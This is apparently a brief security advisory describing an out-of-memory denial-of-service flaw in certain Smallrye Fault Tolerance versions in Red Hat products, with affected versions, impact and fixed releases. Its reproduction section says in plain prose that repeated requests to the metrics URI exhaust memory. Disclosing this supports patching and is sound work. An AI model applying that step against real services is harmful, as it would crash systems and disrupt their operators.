Smallrye Fault Tolerance Out-of-Memory Vulnerability in Red Hat Products
Vulnerability
A denial-of-service vulnerability has been identified in the Smallrye Fault Tolerance component, specifically in versions 6.3.0 prior to 6.4.2 and 6.5.0 prior to 6.9.0. This vulnerability is triggered when the metrics URI is called, leading to an out-of-memory condition. Each request to the metrics URI creates a new object in the meterMap, which can exhaust system memory and cause application crashes.
Impact
Exploitation of this vulnerability leads to out-of-memory conditions, causing applications to crash or consume excessive system memory.
Reproduction
To reproduce this vulnerability, send repeated requests to the metrics URI of an application using the affected Smallrye Fault Tolerance version. Each request will generate a new object in the meterMap, potentially leading to an out-of-memory error.
Remediation
Users can upgrade to Smallrye Fault Tolerance versions 6.4.2 or 6.9.0, both of which include the necessary fix.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.